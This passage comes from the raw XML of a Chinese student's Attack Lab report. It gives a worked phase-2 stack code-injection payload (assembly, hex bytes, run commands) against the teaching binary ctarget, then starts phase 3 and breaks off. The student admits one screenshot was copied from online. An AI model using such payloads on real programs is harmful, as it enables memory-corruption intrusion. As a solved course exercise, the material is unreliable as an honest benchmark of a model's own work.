            <wp:effectExtent l="0" t="0" r="1270" b="1905"/>
            <wp:docPr id="7" name="图片 7" descr="NR0([1MI0]1IL5G0)W3[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NR0([1MI0]1IL5G0)W3[N{0"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3141980" cy="312420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>又因为任务的目的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将cookie值拷贝至寄存器 %rdi 中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将函数touch2的地址压入栈中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使得程序顺利进入函数touch2中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>所以有编译代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mov $</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x43e6fb4c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>,%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rdi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pushq $</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x40195f</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>retq</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>用gcc和反汇编工具将编译语言转化为机器代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3494405" cy="2607310"/>
            <wp:effectExtent l="0" t="0" r="1270" b="2540"/>
            <wp:docPr id="11" name="图片 11" descr="V8O2{)0]K7SI~HB]WP)DO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V8O2{)0]K7SI~HB]WP)DO4E"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3494405" cy="2607310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>已知机器代码和rsp的值,输入字符串=操作数+缓冲区+返回地址：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>48 c7 c7 4c fb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e6 43</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>68 5f 19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>40 00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> 00 00 00 00 00 00 00 00 00 00 00 48 05 61 55 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用vi编辑器创建文件“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.txt”，将该段字符串保存后，使用“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>./hex2raw &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">.txt&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”命令将该字节文本文件转为字符文本文件“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.txt”保存。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">接下来使用命令“./ctarget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">–i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.txt”将准备好的字符串读入程序中，运行结果如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3230880" cy="333375"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="13" name="图片 13" descr="F[F{E1V0X17T5VMSX_FHQ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F{E1V0X17T5VMSX_FHQ8N"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3230880" cy="333375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3108960" cy="363855"/>
            <wp:effectExtent l="0" t="0" r="5715" b="7620"/>
            <wp:docPr id="15" name="图片 15" descr="6{5$P8BU$6ARFT554OE6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5$P8BU$6ARFT554OE6_]4"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3108960" cy="363855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（此处我通过但忘记截图了，后来尝试发现每一个关卡只能通过一次，就在网上找了张成功运行的截图，只有此处图片非本人截图，其他都为本人截图。）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>任务3：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 3 also involves a code injection attack, but passing a string as argument.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Within the file ctarget there is code for functions hexmatch and touch3 having the following C re</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>presentations:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1 /* Compare string to hex represention of unsigned value */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2 int hexmatch(unsigned val, char *sval)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3 {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>4 char cbuf[110];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5 /* Make position of check string unpredictable */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6 char *s = cbuf + random() % 100;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>7 sprintf(s, "%.8x", val);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>8 return strncmp(sval, s, 9) == 0;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>9 }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>11 void touch3(char *sval)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>12 {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>13 vlevel = 3; /* Part of validation protocol */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>14 if (hexmatch(cookie, sval)) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>15 printf("Touch3!: You called touch3(\"%s\")\n", sval);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
